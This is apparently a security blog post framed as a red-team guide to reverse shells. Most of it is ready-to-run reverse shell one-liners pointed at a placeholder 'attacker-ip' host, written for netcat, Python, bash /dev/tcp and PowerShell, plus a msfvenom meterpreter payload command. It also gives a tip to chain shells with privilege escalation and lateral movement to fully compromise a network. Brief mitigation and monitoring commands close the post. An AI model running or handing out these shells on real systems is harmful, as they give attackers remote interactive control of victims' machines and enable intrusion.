Listen to this Post
A reverse shell is one of the most powerful post-exploitation techniques in a red team engagement. It allows attackers to gain interactive control of a compromised machine, bypassing firewalls and NAT restrictions. This guide explores reverse shell techniques, evasion tactics, and real-world use cases.
You Should Know:
1. Netcat (Classic Reverse Shell)
- Attacker (Listener):
nc -lvnp 4444
- Victim (Executes Payload):
nc -e /bin/bash attacker-ip 4444
2. Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker-ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
3. Bash Reverse Shell
bash -i >& /dev/tcp/attacker-ip/4444 0>&1
4. PowerShell Reverse Shell (Windows Exploitation)
$client = New-Object System.Net.Sockets.TCPClient("attacker-ip",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
5. Metasploit Reverse Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attacker-ip LPORT=4444 -f elf > shell.elf
Defensive Mitigations
- Restrict outbound traffic to unknown IPs
- Monitor network logs for unusual TCP connections
- Use EDR solutions to detect shellcode execution
- Apply execution policies on PowerShell & Bash scripts
Red Team Pro Tip
A reverse shell alone is not enough—combine it with privilege escalation and lateral movement techniques to fully compromise a network.
What Undercode Say:
Reverse shells are a critical tool in both offensive and defensive cybersecurity. Understanding how they work is essential for penetration testers and system administrators alike. Below are additional commands and steps to deepen your knowledge:
Linux Commands for Monitoring:
- Check open ports:
netstat -tuln
- Monitor network traffic:
tcpdump -i eth0
- List active connections:
lsof -i
Windows Commands for Monitoring:
- Check active connections:
netstat -an
- Monitor processes:
Get-Process
- Check firewall rules:
netsh advfirewall show allprofiles
Further Reading:
Understanding reverse shells and their mitigation strategies is crucial for securing systems against unauthorized access. Always stay updated with the latest security practices and tools to defend against evolving threats.
References:
Reported By: Shihab Hossen – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
